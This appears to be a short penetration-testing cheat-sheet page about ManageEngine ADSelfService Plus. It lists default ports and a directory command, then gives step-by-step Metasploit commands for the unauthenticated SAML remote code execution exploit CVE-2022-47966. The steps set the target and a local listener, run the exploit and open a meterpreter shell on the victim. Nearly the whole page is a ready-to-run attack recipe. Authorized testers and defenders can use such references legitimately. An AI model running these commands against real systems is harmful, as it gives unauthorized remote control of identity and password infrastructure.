ManageEngine ADSelfService Plus PrivEsc
Last modified: 2023-04-16
ADSelfService Plus is an integrated Active Directory self-service password management and single sign-on solution that reduces password-related help desk calls. The default ports are 8888 (HTTP) and 9251 (HTTPS).
Directories
dir -Force "\Program Files (x86)\ManageEngine\ADSelfService Plus\"
Unauthenticated SAML RCE (CVE-2022-47966)
msfconsole
msf> use exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966
msf> set GUID 43ae36f51da65753530a64b37a510a53
msf> set ISSUER_URL http://example.com/adfs/services/trust
msf> set RHOSTS <target-ip>
msf> set RPORT 9251
msf> set LHOST <local-ip>
msf> set LPORT 4444
msf> run
meterpreter> shell